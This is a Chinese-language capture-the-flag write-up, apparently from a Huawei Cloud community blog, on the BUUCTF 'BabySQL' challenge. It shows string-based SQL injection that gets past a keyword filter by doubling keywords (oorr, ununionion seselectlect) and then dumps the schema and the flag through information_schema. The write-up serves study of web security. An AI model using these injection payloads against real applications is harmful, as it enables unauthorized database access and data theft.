记一次经典SQL双写绕过题目[极客大挑战 2019]BabySQL 1
【摘要】 题目环境:作者已经描述进行了严格的过滤做好心理准备进行迎接判断注入类型admin1’字符型注入万能密码注入admin1’ or ‘1’='1报错已经是字符型注入了,所以的话只有or这里存在了过滤联想到buuctf里面还没有碰到双写绕过的题目所以这里斗胆试一下使用双写绕过1' oorr '1'='1成功使用堆叠注入爆数据库1';show database();报错抛弃堆叠注入尝试联合注入联合注...
题目环境:
作者已经描述进行了严格的过滤
做好心理准备进行迎接
判断注入类型
admin
1’
字符型注入
万能密码注入
admin
1’ or ‘1’='1
报错
已经是字符型注入了,所以的话只有or这里存在了过滤
联想到buuctf里面还没有碰到双写绕过的题目
所以这里斗胆试一下使用双写绕过
1' oorr '1'='1
成功
使用堆叠注入爆数据库1';show database();
报错
抛弃堆叠注入
尝试联合注入
联合注入末尾需要使用#号键进行注释#号后面的命令,避免报错
这里值得提一下schema和schemata和常见命令的理解
SCHEMA在MySQL中是数据库,SCHEMATA表用来提供有关数据库的信息。
union select就是联合注入,联合查询的意思
from来自
information_schema是MySQL自带的数据库
group_concat将值连接起来
where来自那个数据库或数据表等等
爆列数(关键命令采用双写进行绕过)1' oorrder bbyy 4#
1' oorrder bbyy 3#
可知列数只有3列
查位(关键命令采用双写进行绕过)1' ununionion seselectlect 1,2,3#
爆数据库(关键命令采用双写进行绕过)1' ununionion seselectlect 1,database(),3#
采用第三列进行注入
爆所有数据库(关键命令采用双写进行绕过)1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
根据常识ctf数据库里面存在flag的可能更大,故选择ctf数据库
爆ctf数据库里面的数据表1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#
因为ctf在schema里面所有这里就是table_schema,schema里面的数据库ctf里面的数据表
得到Flag数据表
爆Flag数据表里面的字段1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
得到flag字段
爆flag字段内容1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#
ctf.Flag意思就是ctf数据库里面的Flag数据表
得到flag:flag{fbd18420-cab7-4d6e-8fb9-f8ea6febda61}
【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
作者其他文章
评论(0)